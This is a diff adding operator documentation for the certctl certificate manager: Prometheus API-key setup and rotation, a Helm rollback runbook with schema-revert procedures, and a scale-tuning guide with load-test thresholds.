# Extract just the secret material:
|
||||||
|
jq -r '.key_value' /tmp/prom-key.json
|
||||||
|
```
|
||||||
|
|
||||||
|
The mint endpoint returns the API key plaintext exactly once. The
|
||||||
|
server stores only a constant-time-comparable hash; if you lose the
|
||||||
|
key value, mint a new one.
|
||||||
|
|
||||||
|
## Step 2: Create the Kubernetes Secret
|
||||||
|
|
||||||
|
```bash
|
||||||
|
NAMESPACE=certctl
|
||||||
|
API_KEY=$(jq -r '.key_value' /tmp/prom-key.json)
|
||||||
|
|
||||||
|
kubectl create secret generic certctl-prometheus-key \
|
||||||
|
-n "$NAMESPACE" \
|
||||||
|
--from-literal=api-key="$API_KEY"
|
||||||
|
```
|
||||||
|
|
||||||
|
Now scrub the temporary file:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
shred -u /tmp/prom-key.json
|
||||||
|
```
|
||||||
|
|
||||||
|
## Step 3: Wire the Secret into the chart values
|
||||||
|
|
||||||
|
In your `values.yaml` (or `--set` overrides):
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
monitoring:
|
||||||
|
enabled: true
|
||||||
|
serviceMonitor:
|
||||||
|
enabled: true
|
||||||
|
interval: 30s
|
||||||
|
scrapeTimeout: 10s
|
||||||
|
bearerTokenSecret:
|
||||||
|
name: certctl-prometheus-key
|
||||||
|
key: api-key
|
||||||
|
```
|
||||||
|
|
||||||
|
Re-apply the chart:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
helm upgrade certctl . -n "$NAMESPACE" --reuse-values
|
||||||
|
```
|
||||||
|
|
||||||
|
The rendered ServiceMonitor will now include the `bearerTokenSecret`
|
||||||
|
block. Prometheus Operator's reconciler picks it up and injects the
|
||||||
|
bearer token into the scrape request.
|
||||||
|
|
||||||
|
## Verification
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Confirm the ServiceMonitor renders with the secret reference
|
||||||
|
kubectl get servicemonitor -n "$NAMESPACE" certctl-server -o yaml \
|
||||||
|
| grep -A2 bearerTokenSecret
|
||||||
|
|
||||||
|
# Expected:
|
||||||
|
# bearerTokenSecret:
|
||||||
|
# name: certctl-prometheus-key
|
||||||
|
# key: api-key
|
||||||
|
|
||||||
|
# 2. Tail the certctl-server logs for the next ~60 seconds (one
|
||||||
|
# Prometheus scrape interval). Look for incoming GET /metrics/prometheus
|
||||||
|
# requests authenticated successfully — no 401s.
|
||||||
|
kubectl logs -n "$NAMESPACE" -l app.kubernetes.io/component=server \
|
||||||
|
--tail=100 -f | grep -E "GET /api/v1/metrics/prometheus|metrics-scrape"
|
||||||
|
|
||||||
|
# 3. From the Prometheus UI's "Targets" page, the certctl-server
|
||||||
|
# target should be UP and last-scrape-error empty. If it's
|
||||||
|
# showing 401, the bearer token isn't reaching the request — see
|
||||||
|
# troubleshooting below.
|
||||||
|
```
|
||||||
|
|
||||||
|
## Troubleshooting
|
||||||
|
|
||||||
|
### Prometheus target shows 401
|
||||||
|
|
||||||
|
Three possible causes:
|
||||||
|
|
||||||
|
1. **Wrong Secret name / key.** Run
|
||||||
|
`kubectl get secret -n "$NAMESPACE" certctl-prometheus-key -o yaml`
|
||||||
|
and confirm the `data.api-key` field exists with a base64-encoded
|
||||||
|
non-empty value. The Secret's data field name must match the
|
||||||
|
`bearerTokenSecret.key` value in `monitoring.serviceMonitor`.
|
||||||
|
2. **API key doesn't have `metrics.read`.** Hit the gating endpoint
|
||||||
|
manually from inside the cluster with the same key:
|
||||||
|
```bash
|
||||||
|
kubectl run --rm -it --image=curlimages/curl debug -- \
|
||||||
|
curl -sS -H "Authorization: Bearer <API_KEY>" \
|
||||||
|
https://certctl-server.certctl.svc.cluster.local:8443/api/v1/metrics/prometheus
|
||||||
|
```
|
||||||
|
A 401 here means the role doesn't include `metrics.read`. A 403
|
||||||
|
means the role exists but the API key isn't assigned to it.
|
||||||
|
3. **TLS verification failure (not a 401, but masquerading as one in
|
||||||
|
Prometheus's logs).** The default ServiceMonitor template sets
|
||||||
|
`insecureSkipVerify: true` to support demos — production deploys
|
||||||
|
should set `tlsConfig.caFile` or `tlsConfig.ca.secret` per the
|
||||||
|
ServiceMonitor docs.
|
||||||
|
|
||||||
|
### Prometheus target shows TLS errors
|
||||||
|
|
||||||
|
`monitoring.serviceMonitor.tlsConfig` overrides the default. Three
|
||||||
|
patterns:
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
# Pattern 1: trust the system CA bundle (production behind a real CA)
|
||||||
|
tlsConfig:
|
||||||
|
caFile: /etc/ssl/certs/ca-certificates.crt
|
||||||
|
serverName: certctl.your-org.example
|
||||||
|
|
||||||
|
# Pattern 2: trust a CA from a Secret mounted by Prometheus Operator
|
||||||
|
tlsConfig:
|
||||||
|
ca:
|
||||||
|
secret:
|
||||||
|
name: certctl-ca
|
||||||
|
key: ca.crt
|
||||||
|
serverName: certctl.your-org.example
|
||||||
|
|
||||||
|
# Pattern 3: skip verification (DEMO ONLY — DO NOT USE IN PRODUCTION)
|
||||||
|
tlsConfig:
|
||||||
|
insecureSkipVerify: true
|
||||||
|
```
|
||||||
|
|
||||||
|
The certctl server's self-signed bootstrap cert (default
|
||||||
|
`server.tls.existingSecret` from the chart) presents a CN of
|
||||||
|
`certctl-server`. If your `serverName` doesn't match, the scrape
|
||||||
|
fails with `x509: certificate is valid for certctl-server, not ...`.
|
||||||
|
|
||||||
|
## Rotation
|
||||||
|
|
||||||
|
API keys are constant-time-compared, stored hashed, and never
|
||||||
|
logged. Rotation:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Mint a new key (same actor + role)
|
||||||
|
curl -sS --cacert ./ca.crt -X POST \
|
||||||
|
-H "Authorization: Bearer ${ADMIN_API_KEY}" \
|
||||||
|
-H "Content-Type: application/json" \
|
||||||
|
https://certctl.your-org.example/api/v1/auth/apikeys \
|
||||||
|
-d '{"actor_id":"actor-prometheus","name":"prometheus-scrape-token-v2"}' \
|
||||||
|
| tee /tmp/prom-key-new.json
|
||||||
|
|
||||||
|
# 2. Update the Secret in place
|
||||||
|
kubectl create secret generic certctl-prometheus-key \
|
||||||
|
-n certctl \
|
||||||
|
--from-literal=api-key="$(jq -r '.key_value' /tmp/prom-key-new.json)" \
|
||||||
|
--dry-run=client -o yaml | kubectl apply -f -
|
||||||
|
|
||||||
|
# 3. Wait one scrape interval; verify the next scrape uses the new key.
|
||||||
|
|
||||||
|
# 4. Revoke the old key
|
||||||
|
curl -sS --cacert ./ca.crt -X DELETE \
|
||||||
|
-H "Authorization: Bearer ${ADMIN_API_KEY}" \
|
||||||
|
https://certctl.your-org.example/api/v1/auth/apikeys/<OLD_KEY_ID>
|
||||||
|
|
||||||
|
# 5. Scrub the temp file
|
||||||
|
shred -u /tmp/prom-key-new.json
|
||||||
|
```
|
||||||
|
|
||||||
|
Prometheus Operator picks up Secret changes automatically — no
|
||||||
|
ServiceMonitor edit needed, no Prometheus restart.
|
||||||
|
|
||||||
|
## Related reading
|
||||||
|
|
||||||
|
- [`docs/operator/rbac.md`](../rbac.md) — the full RBAC primitive,
|
||||||
|
permission catalogue, and role-assignment workflow.
|
||||||
|
- [`docs/operator/security.md`](../security.md) — the broader auth
|
||||||
|
posture including the API key / OIDC / break-glass paths.
|
||||||
|
- [`docs/operator/auth-threat-model.md`](../auth-threat-model.md) —
|
||||||
|
why `/api/v1/metrics/prometheus` is gated, and what an
|
||||||
|
unauthenticated leak of metrics data would reveal.
|
||||||
@@ -0,0 +1,193 @@
|
|||||||
|
# Runbook: Helm rollback for certctl
|
||||||
|
|
||||||
|
> Last reviewed: 2026-05-14
|
||||||
|
|
||||||
|
Use this when:
|
||||||
|
- A `helm upgrade` rolled out a bad release and the operator wants to
|
||||||
|
return to the previous working state.
|
||||||
|
- A schema migration shipped a change the operator wants to back out.
|
||||||
|
- An emergency change needs reverting and forward-fix isn't yet
|
||||||
|
available.
|
||||||
|
|
||||||
|
This page covers `helm rollback` mechanics + the cases where
|
||||||
|
rollback is NOT enough on its own (schema migrations are the main
|
||||||
|
one).
|
||||||
|
|
||||||
|
## What `helm rollback` does
|
||||||
|
|
||||||
|
`helm rollback <release> [revision]` re-applies the manifests from a
|
||||||
|
previous Helm revision. It re-creates / updates Kubernetes objects to
|
||||||
|
match that revision's template output and is safe for:
|
||||||
|
|
||||||
|
- **Deployment image bumps:** rolls the container image back to the
|
||||||
|
previous tag. Pods restart with the old image.
|
||||||
|
- **ConfigMap / Secret content changes:** old values land in the
|
||||||
|
config; pods that consume them via `envFrom` or volume mounts get
|
||||||
|
the prior values on the next restart.
|
||||||
|
- **Resource requests / limits / replica count:** the spec changes
|
||||||
|
back to the prior values. Kubernetes reschedules pods accordingly.
|
||||||
|
- **Service / Ingress / NetworkPolicy changes:** networking flips
|
||||||
|
back to the previous shape immediately.
|
||||||
|
|
||||||
|
## What `helm rollback` does NOT do
|
||||||
|
|
||||||
|
The Kubernetes layer is reversible; the **database schema is not**.
|
||||||
|
This is the single most common gap in a rollback plan.
|
||||||
|
|
||||||
|
### Schema migrations are forward-only by design
|
||||||
|
|
||||||
|
certctl's migrations under `migrations/` are numbered up-migrations
|
||||||
|
(`NNNNNN_*.up.sql`) with paired down-migrations
|
||||||
|
(`NNNNNN_*.down.sql`) shipped alongside. The `postgres.RunMigrations`
|
||||||
|
path applied at server boot only runs the `*.up.sql` files. The
|
||||||
|
`*.down.sql` files exist for development reference + a hypothetical
|
||||||
|
"surgical revert" path but are **not invoked by `helm rollback`**.
|
||||||
|
|
||||||
|
The implication: if `v2.1.0 → v2.2.0` ships migrations 000100,
|
||||||
|
000101, 000102 (adding columns, changing constraints, dropping
|
||||||
|
indexes), then `helm rollback` to v2.1.0 takes you back to the v2.1.0
|
||||||
|
container image — but the database still has migrations 000100-102
|
||||||
|
applied. The v2.1.0 server code doesn't know about those columns; it
|
||||||
|
either ignores them (best case) or fails to start (if the schema
|
||||||
|
diverged in a way the older code can't tolerate).
|
||||||
|
|
||||||
|
### When is rollback safe without a schema revert?
|
||||||
|
|
||||||
|
Migrations are **additive-only** in 90%+ of cases. The categories:
|
||||||
|
|
||||||
|
| Migration class | Safe to roll back without schema revert? | Why |
|
||||||
|
|---|---|---|
|
||||||
|
| Add column with default | Yes | Old code ignores the new column |
|
||||||
|
| Add table | Yes | Old code doesn't reference the table |
|
||||||
|
| Add index | Yes | Old code doesn't depend on the index existing |
|
||||||
|
| Add CHECK / FOREIGN KEY constraint | Usually yes | Only fails on row data inserted by new code that violates the old code's constraints |
|
||||||
|
| Rename column / table | NO | Old code's queries reference the original name |
|
||||||
|
| Drop column / table | NO (data loss) | New code already stopped writing the column; old code expects it |
|
||||||
|
| Type change (`VARCHAR(40)` → `TEXT`) | Usually yes | Old code's column read still works |
|
||||||
|
| Backfill a column | Yes | Old code ignores the backfilled value |
|
||||||
|
|
||||||
|
If your upgrade only added columns / tables / indexes, `helm
|
||||||
|
rollback` is sufficient. If it renamed or dropped anything, you need
|
||||||
|
a database-level revert.
|
||||||
|
|
||||||
|
## Procedure: standard rollback (additive-only migrations)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Identify the target revision
|
||||||
|
helm history certctl -n <namespace>
|
||||||
|
|
||||||
|
# 2. Take a backup BEFORE rolling back (defense in depth — if
|
||||||
|
# rollback exposes a data corruption issue, restore is the only
|
||||||
|
# path back)
|
||||||
|
# See docs/operator/runbooks/postgres-backup.md for the canonical
|
||||||
|
# pg_dump invocation.
|
||||||
|
|
||||||
|
# 3. Roll back to the chosen revision
|
||||||
|
helm rollback certctl <revision> -n <namespace> --wait --timeout 5m
|
||||||
|
|
||||||
|
# 4. Verify
|
||||||
|
kubectl get pods -n <namespace> -l app.kubernetes.io/instance=certctl
|
||||||
|
kubectl logs -n <namespace> -l app.kubernetes.io/component=server --tail=50
|
||||||
|
```
|
||||||
|
|
||||||
|
Watch for migration-version mismatch warnings in the server logs. If
|
||||||
|
the older server code refuses to start because the schema is ahead
|
||||||
|
of what it knows about, escalate to "rollback with schema revert."
|
||||||
|
|
||||||
|
## Procedure: rollback with schema revert
|
||||||
|
|
||||||
|
This is the rare case. Use it when:
|
||||||
|
- A column / table was renamed or dropped in the rolled-up release.
|
||||||
|
- The older code refuses to start with the newer schema.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Take a fresh backup right NOW (the current schema is what we're
|
||||||
|
# reverting from; if anything goes wrong we want a clean
|
||||||
|
# forward-recovery option)
|
||||||
|
kubectl exec -n <namespace> statefulset/certctl-postgres -- \
|
||||||
|
pg_dump --format=custom --no-owner --no-acl --dbname=certctl \
|
||||||
|
> "certctl-pre-rollback-$(date -u +%Y%m%dT%H%M%SZ).dump"
|
||||||
|
|
||||||
|
# 2. Stop the server Deployment to prevent it from writing to the
|
||||||
|
# database during the revert
|
||||||
|
kubectl scale deploy/certctl-server -n <namespace> --replicas=0
|
||||||
|
|
||||||
|
# 3. Apply the relevant *.down.sql files manually, one at a time, in
|
||||||
|
# reverse migration-number order. Example for reverting two
|
||||||
|
# migrations:
|
||||||
|
NEW=000102 # newest migration on the running schema
|
||||||
|
OLD=000100 # oldest migration to revert (inclusive)
|
||||||
|
for MIG in 000102 000101 000100; do
|
||||||
|
kubectl exec -i -n <namespace> statefulset/certctl-postgres -- \
|
||||||
|
psql --user=certctl --dbname=certctl \
|
||||||
|
< migrations/${MIG}_*.down.sql
|
||||||
|
done
|
||||||
|
|
||||||
|
# 4. Manually update the schema_migrations table to reflect the
|
||||||
|
# reverted state (the migration runner's bookkeeping)
|
||||||
|
kubectl exec -n <namespace> statefulset/certctl-postgres -- \
|
||||||
|
psql --user=certctl --dbname=certctl -c \
|
||||||
|
"DELETE FROM schema_migrations WHERE version > $((OLD - 1));"
|
||||||
|
|
||||||
|
# 5. NOW run helm rollback. The server pod will start with a schema
|
||||||
|
# that matches its code.
|
||||||
|
helm rollback certctl <revision> -n <namespace> --wait --timeout 5m
|
||||||
|
```
|
||||||
|
|
||||||
|
The `*.down.sql` files are tested but only against pristine schemas —
|
||||||
|
they may not handle every data shape a production database
|
||||||
|
accumulates. ALWAYS take a backup first; the down-migrations are
|
||||||
|
a recovery tool, not a transactional contract.
|
||||||
|
|
||||||
|
## Procedure: full restore (when revert isn't tractable)
|
||||||
|
|
||||||
|
When a down-migration would lose data (drop columns / tables that
|
||||||
|
hold rows the older code can't read but the newer code populated), a
|
||||||
|
full restore is the only safe path. This is the procedure described
|
||||||
|
in
|
||||||
|
[`docs/operator/runbooks/disaster-recovery.md`](disaster-recovery.md#postgres-restore).
|
||||||
|
The summary:
|
||||||
|
|
||||||
|
1. Stop certctl.
|
||||||
|
2. Take a backup of the CURRENT schema (defense in depth).
|
||||||
|
3. Restore the LAST backup taken BEFORE the bad upgrade.
|
||||||
|
4. Roll the Helm release back to the matching code version.
|
||||||
|
5. Restart certctl.
|
||||||
|
6. Re-run any audited writes that happened in the window between the
|
||||||
|
backup and the bad upgrade (read the audit log; the API surface
|
||||||
|
is recoverable).
|
||||||
|
|
||||||
|
The DR runbook owns the canonical commands.
|
||||||
|
|
||||||
|
## Common pitfalls
|
||||||
|
|
||||||
|
- **Forgetting the backup before rollback.** A schema-revert path is
|
||||||
|
not safe without a fresh backup. If something goes wrong mid-revert
|
||||||
|
and your most recent backup is from last night, you've lost any
|
||||||
|
cert-issuance history between then and now.
|
||||||
|
- **Rolling back the chart without rolling back the database state**
|
||||||
|
on a release that included a destructive migration (drop column,
|
||||||
|
drop table). Symptoms: old code starts, queries fail with
|
||||||
|
"column does not exist," server crashes in a loop. Recovery
|
||||||
|
requires schema revert OR full restore.
|
||||||
|
- **Letting the agents drift.** `helm rollback` updates the agent
|
||||||
|
DaemonSet's image too — agents on different versions than the
|
||||||
|
server may produce incompatible CSR payloads. After rollback,
|
||||||
|
confirm agent images are at the matching version via
|
||||||
|
`kubectl get daemonset certctl-agent -o jsonpath='{.spec.template.spec.containers[0].image}'`.
|
||||||
|
- **GHCR images pinned by digest:** the rollback restores the prior
|
||||||
|
`image:` value from the Helm template. If your operator workflow
|
||||||
|
uses `image.digest` pinning, the digest comes back too — make
|
||||||
|
sure that digest still exists on ghcr.io. They do persist; old
|
||||||
|
tags are never deleted, but a private mirror may have garbage-collected.
|
||||||
|
|
||||||
|
## Related reading
|
||||||
|
|
||||||
|
- [`docs/operator/runbooks/postgres-backup.md`](postgres-backup.md) —
|
||||||
|
the backup procedure that's the precondition for any
|
||||||
|
schema-revert path.
|
||||||
|
- [`docs/operator/runbooks/disaster-recovery.md`](disaster-recovery.md) —
|
||||||
|
the full restore procedure when rollback isn't tractable.
|
||||||
|
- [`docs/migration/api-keys-to-rbac.md`](../../migration/api-keys-to-rbac.md) —
|
||||||
|
example of a migration that the runtime supports rolling back via
|
||||||
|
feature flag (rare).
|
||||||
@@ -0,0 +1,250 @@
|
|||||||
|
# Operator scale guide
|
||||||
|
|
||||||
|
> Last reviewed: 2026-05-14
|
||||||
|
|
||||||
|
Use this when:
|
||||||
|
- You're sizing a new certctl deployment for a target fleet count.
|
||||||
|
- You're scaling an existing deployment up from demo (15 certs / 1
|
||||||
|
agent) to production (1K+ certs / 100+ agents).
|
||||||
|
- An auditor asks "what does this scale to?" and you want a documented
|
||||||
|
answer that isn't "we haven't measured."
|
||||||
|
|
||||||
|
## DB connection pool
|
||||||
|
|
||||||
|
certctl's PostgreSQL connection pool is the single largest scale lever.
|
||||||
|
Pool exhaustion looks like 503s + agent poll timeouts + scheduler
|
||||||
|
falling behind on its loops. The default ships at 50 max open
|
||||||
|
connections (`CERTCTL_DATABASE_MAX_CONNS=50`), with idle = max/5 = 10
|
||||||
|
under the existing `internal/repository/postgres/db.go::NewDBWithMaxConns`
|
||||||
|
contract.
|
||||||
|
|
||||||
|
Operator-tune ladder:
|
||||||
|
|
||||||
|
| Fleet size | `CERTCTL_DATABASE_MAX_CONNS` | Postgres `max_connections` | Notes |
|
||||||
|
|---|---|---|---|
|
||||||
|
| ≤ 500 certs / 100 agents | `50` (default) | `100` (PG default) | Demo + small deployments. Pool default sized for this. |
|
||||||
|
| 5K certs / 1K agents | `100` | `200` | Postgres needs an explicit bump from the 100 default; reload required. |
|
||||||
|
| 50K certs / 10K agents | `200` | `400` | Plus dedicated Postgres VM (separate from server host); shared_buffers ≥ 1Gi. |
|
||||||
|
|
||||||
|
Always leave headroom in Postgres's `max_connections` for backups
|
||||||
|
(`pg_dump` opens its own connection), ad-hoc psql sessions, and
|
||||||
|
replicas. The ratio `(server pool size × replicas) + 20` is a safe
|
||||||
|
floor for Postgres's `max_connections`.
|
||||||
|
|
||||||
|
**Numbers above the small-fleet row are operator-tuning starting
|
||||||
|
points, not validated ceilings.** Phase 8 of the architecture diligence
|
||||||
|
remediation will replace these with measured values from synthetic
|
||||||
|
fleets; until then, capture your own observations in a loadtest log
|
||||||
|
and tune against them.
|
||||||
|
|
||||||
|
## Scheduler tick budgets
|
||||||
|
|
||||||
|
certctl has 15 scheduler loops, each with its own cadence
|
||||||
|
(internal/scheduler/scheduler.go). The renewal scan is the hottest
|
||||||
|
loop on large fleets: it pulls every managed certificate, applies
|
||||||
|
each profile's renewal policy, and dispatches an issuance job per
|
||||||
|
cert that meets the threshold. The default cadence is `1h`
|
||||||
|
(`CERTCTL_SCHEDULER_RENEWAL_CHECK_INTERVAL`).
|
||||||
|
|
||||||
|
Phase 6 SCALE-M5 closure (2026-05-14) added per-ticker jitter via the
|
||||||
|
`internal/scheduler.JitteredTicker` wrapper. Each loop's interval is
|
||||||
|
unchanged; the wrapper adds ±10% randomized delay per tick so multiple
|
||||||
|
loops with the same nominal cadence don't co-fire and cause hour-
|
||||||
|
boundary CPU + DB spikes. For most fleets the visible effect is a
|
||||||
|
smoother CPU graph during the renewal scan.
|
||||||
|
|
||||||
|
**Renewal-sweep semaphore (SCALE-L1).** The renewal loop dispatches
|
||||||
|
concurrent issuance work behind a per-tick semaphore (default
|
||||||
|
`CERTCTL_RENEWAL_CONCURRENCY=25`). Under tick-budget pressure (a tick
|
||||||
|
that exceeds the loop interval), the semaphore can hold the entire
|
||||||
|
concurrency cap until the context cancels at next-tick boundary —
|
||||||
|
which is intentional. The drain happens via context cancellation; new
|
||||||
|
work isn't started past the deadline. Tests in
|
||||||
|
`internal/scheduler/` pin this drain behavior. Operators on large
|
||||||
|
fleets should:
|
||||||
|
|
||||||
|
1. Bump `CERTCTL_RENEWAL_CONCURRENCY` to 50 or 100 if the renewal scan
|
||||||
|
consistently exceeds tick budget.
|
||||||
|
2. Also bump `CERTCTL_DATABASE_MAX_CONNS` proportionally — each
|
||||||
|
concurrent renewal task opens its own pool connection during
|
||||||
|
issuance / deployment.
|
||||||
|
3. Watch for the "renewal scan complete" log line per tick. If it's
|
||||||
|
consistently late, you're under-provisioned.
|
||||||
|
|
||||||
|
## Async CA polling budgets (SCALE-M3)
|
||||||
|
|
||||||
|
DigiCert, Entrust, GlobalSign, and Sectigo are async issuers — they
|
||||||
|
accept a CSR, queue it on the CA side, and return a polling token.
|
||||||
|
The certctl server polls the CA's status endpoint until the cert is
|
||||||
|
ready or the deadline expires. The default poll-deadline is 10
|
||||||
|
minutes wall-clock (`asyncpoll.DefaultMaxWait`); after that the
|
||||||
|
issuance returns `StillPending` and the scheduler re-enqueues the
|
||||||
|
job for the next tick.
|
||||||
|
|
||||||
|
Priority chain when picking the actual deadline (highest → lowest):
|
||||||
|
|
||||||
|
1. Per-connector env: `CERTCTL_DIGICERT_POLL_MAX_WAIT_SECONDS`,
|
||||||
|
`CERTCTL_ENTRUST_POLL_MAX_WAIT_SECONDS`,
|
||||||
|
`CERTCTL_GLOBALSIGN_POLL_MAX_WAIT_SECONDS`,
|
||||||
|
`CERTCTL_SECTIGO_POLL_MAX_WAIT_SECONDS`.
|
||||||
|
2. Global env: `CERTCTL_ASYNC_POLL_MAX_WAIT_SECONDS` (sets the
|
||||||
|
process-wide default for all async-CA connectors that didn't set
|
||||||
|
their per-connector value).
|
||||||
|
3. Package const: `asyncpoll.DefaultMaxWait = 10 * time.Minute`.
|
||||||
|
|
||||||
|
Operators with slow async CAs (Entrust certificate-mode in
|
||||||
|
particular can take 15-30 minutes during business hours) should
|
||||||
|
raise the per-connector value rather than the global; that way fast
|
||||||
|
issuers don't pay the polling cost.
|
||||||
|
|
||||||
|
## Cursor pagination caching (SCALE-L2)
|
||||||
|
|
||||||
|
Phase 6 SCALE-L2 closure (2026-05-14) added an ETag middleware at
|
||||||
|
`internal/api/middleware/etag.go` covering the top-5 read endpoints:
|
||||||
|
`/api/v1/certificates`, `/api/v1/jobs`, `/api/v1/agents`,
|
||||||
|
`/api/v1/audit`, `/api/v1/discovery/certificates`. The ETag is
|
||||||
|
derived from `(max-row-updated-at, row-count)` for the requested
|
||||||
|
filter; repeated requests with the same query return `304 Not
|
||||||
|
Modified` when the underlying data hasn't changed. The dashboard
|
||||||
|
benefits most — its polling loop on the certificates page is the
|
||||||
|
single largest read-traffic source on most deployments.
|
||||||
|
|
||||||
|
When the cache is effective, repeated reads bypass the
|
||||||
|
`SELECT COUNT(*) FROM <table>` query entirely. The cache invalidates
|
||||||
|
on any mutation to the table (the row-count + max-updated-at hash
|
||||||
|
flips).
|
||||||
|
|
||||||
|
Operators don't need to do anything to opt in — the middleware is
|
||||||
|
wired around the top-5 endpoints unconditionally. If you want to
|
||||||
|
verify it's working, check the `ETag:` response header on a list
|
||||||
|
endpoint and repeat the request with the same value in an
|
||||||
|
`If-None-Match:` header — the second request should return 304 with
|
||||||
|
an empty body.
|
||||||
|
|
||||||
|
## Scale-tier scenarios (SCALE-H2, Phase 8)
|
||||||
|
|
||||||
|
Phase 8 (2026-05-14) extended the k6 load-test harness with three new
|
||||||
|
scenarios that exercise the scale-relevant load surfaces the original
|
||||||
|
API tier left uncovered. They live behind a compose profile gate
|
||||||
|
(`docker compose --profile scale`) so the default `make loadtest`
|
||||||
|
stays focused on per-PR regression scope. The full set runs weekly on
|
||||||
|
the same `loadtest.yml` cron as the API + connector tier.
|
||||||
|
|
||||||
|
| Scenario | k6 file | Seed fixture | Sustained load |
|
||||||
|
|---|---|---|---|
|
||||||
|
| Bulk-renewal under load | `deploy/test/loadtest/k6/bulk_renewal.js` | 10,000 managed_certificates (`seed/01_bulk_renewal_certs.sql`) | 5 req/s POST `/api/v1/certificates/bulk-renew` × 5 min |
|
||||||
|
| ACME enrollment burst | `deploy/test/loadtest/k6/acme_burst.js` | (none — unauth surface) | 200 concurrent VUs × directory/nonce/ARI × 5 min |
|
||||||
|
| Agent heartbeat storm | `deploy/test/loadtest/k6/agent_storm.js` | 5,000 agents (`seed/02_agent_fleet.sql`) | 167 req/s POST `/api/v1/agents/{id}/heartbeat` × 5 min |
|
||||||
|
|
||||||
|
### Threshold contracts (regression guards, NOT measured baselines)
|
||||||
|
|
||||||
|
| Scenario | Metric | Threshold |
|
||||||
|
|---|---|---|
|
||||||
|
| Bulk-renewal | `http_req_duration{scenario:bulk_renewal}` p99 | < 5 s |
|
||||||
|
| Bulk-renewal | `http_req_duration{scenario:bulk_renewal}` p95 | < 2 s |
|
||||||
|
| Bulk-renewal | `http_req_failed{scenario:bulk_renewal}` | < 1% |
|
||||||
|
| ACME burst | `acme_directory_duration` p95 | < 500 ms |
|
||||||
|
| ACME burst | `acme_new_nonce_duration` p95 | < 300 ms |
|
||||||
|
| ACME burst | `acme_renewal_info_duration` p95 | < 800 ms |
|
||||||
|
| ACME burst | `http_req_failed{server_error:true}` 5xx-only | < 0.1% |
|
||||||
|
| Agent storm | `http_req_duration{scenario:agent_storm}` p99 | < 1 s |
|
||||||
|
| Agent storm | `http_req_duration{scenario:agent_storm}` p95 | < 500 ms |
|
||||||
|
| Agent storm | `http_req_failed{scenario:agent_storm}` | < 0.1% |
|
||||||
|
|
||||||
|
429 rate-limit responses on the ACME burst are EXPECTED — Phase 5's
|
||||||
|
per-account rate limiter SHOULD fire at sustained 200-VU pressure.
|
||||||
|
The custom `acme_rate_limited_count` Counter tracks how often it
|
||||||
|
fires; `acme_rate_limit_shape_ok` Counter verifies every 429 returns
|
||||||
|
the RFC 7807 `application/problem+json` shape with the
|
||||||
|
`urn:ietf:params:acme:error:rateLimited` type. A regression that
|
||||||
|
returned plain-text 429 or a different problem type would surface as
|
||||||
|
`(rate_limited_count - shape_ok_count) > 0` in the summary.
|
||||||
|
|
||||||
|
### Measured baseline — TBD pending canonical-hardware capture
|
||||||
|
|
||||||
|
The Phase 8 scenarios shipped 2026-05-14. Baseline capture on a
|
||||||
|
canonical `ubuntu-latest` GitHub runner is the next operational step;
|
||||||
|
until then, the table below holds TBD placeholders. **Do NOT publish
|
||||||
|
sandbox-captured numbers here** — the same anti-pattern the original
|
||||||
|
loadtest README guards against (sandbox-aggregate placeholder vs
|
||||||
|
canonical hardware) applies to Phase 8.
|
||||||
|
|
||||||
|
| Scenario | p50 | p95 | p99 | Error rate | Date measured | Commit |
|
||||||
|
|---|---|---|---|---|---|---|
|
||||||
|
| **bulk_renewal** | TBD | TBD | TBD | TBD | — | — |
|
||||||
|
| **acme_burst** directory | TBD | TBD | TBD | TBD | — | — |
|
||||||
|
| **acme_burst** new-nonce | TBD | TBD | TBD | TBD | — | — |
|
||||||
|
| **acme_burst** renewal-info | TBD | TBD | TBD | TBD | — | — |
|
||||||
|
| **agent_storm** | TBD | TBD | TBD | TBD | — | — |
|
||||||
|
|
||||||
|
Capture procedure: trigger `loadtest.yml` from the Actions tab against
|
||||||
|
the current `master` SHA; wait for the `k6-scale` matrix jobs to
|
||||||
|
complete; download the per-scenario summary artifacts; copy p50/p95/
|
||||||
|
p99 from `summary-<scenario>.json` into the table; commit the
|
||||||
|
captured numbers alongside the date + SHA. Replace this paragraph
|
||||||
|
with the captured-on row when the first canonical run lands.
|
||||||
|
|
||||||
|
### How to run the scale tier locally
|
||||||
|
|
||||||
|
```sh
|
||||||
|
# All three scenarios serially (~18 min total):
|
||||||
|
make loadtest-scale
|
||||||
|
|
||||||
|
# Individual scenarios (each ~6 min):
|
||||||
|
make loadtest-scale-bulk # 10K cert bulk-renew
|
||||||
|
make loadtest-scale-acme # 200 VU ACME burst
|
||||||
|
make loadtest-scale-agent # 5K agent heartbeat storm
|
||||||
|
```
|
||||||
|
|
||||||
|
Each scenario boots its own copy of the loadtest compose stack
|
||||||
|
(postgres + tls-init + certctl-server) plus the `scale-seed` init
|
||||||
|
container that runs the SQL fixtures from `deploy/test/loadtest/seed/`.
|
||||||
|
The seed is idempotent (`ON CONFLICT … DO NOTHING`) so re-running a
|
||||||
|
scenario against the same compose stack is cheap.
|
||||||
|
|
||||||
|
### Documented limitations of the scale tier
|
||||||
|
|
||||||
|
- **JWS-signed ACME flows are not measured.** The ACME burst scenario
|
||||||
|
hits the unauthenticated directory + new-nonce + ARI surface only.
|
||||||
|
Measuring the JWS-signed POST hot path (new-account / new-order /
|
||||||
|
finalize) requires bundling a JWS signer into the k6 driver (k6
|
||||||
|
doesn't ship JWS). End-to-end JWS conformance is gated by
|
||||||
|
`make acme-rfc-conformance-test` which drives `lego` against the
|
||||||
|
same stack.
|
||||||
|
- **Scheduler renewal scan throughput.** The bulk-renewal scenario
|
||||||
|
measures the inbound POST throughput; the scheduler's
|
||||||
|
`jobProcessorLoop` drains the enqueued jobs at a fixed per-tick
|
||||||
|
budget (`CERTCTL_RENEWAL_CONCURRENCY=25` default), and the
|
||||||
|
throughput of that path is not amplified by adding more inbound
|
||||||
|
bulk-renew calls. A future scenario could pull
|
||||||
|
`/api/v1/jobs?status=pending` and measure drain time.
|
||||||
|
- **Production-sized Postgres.** The compose stack runs
|
||||||
|
`postgres:16-alpine` with default config on a CI runner.
|
||||||
|
Production deploys with `shared_buffers >= 1 GiB` + dedicated
|
||||||
|
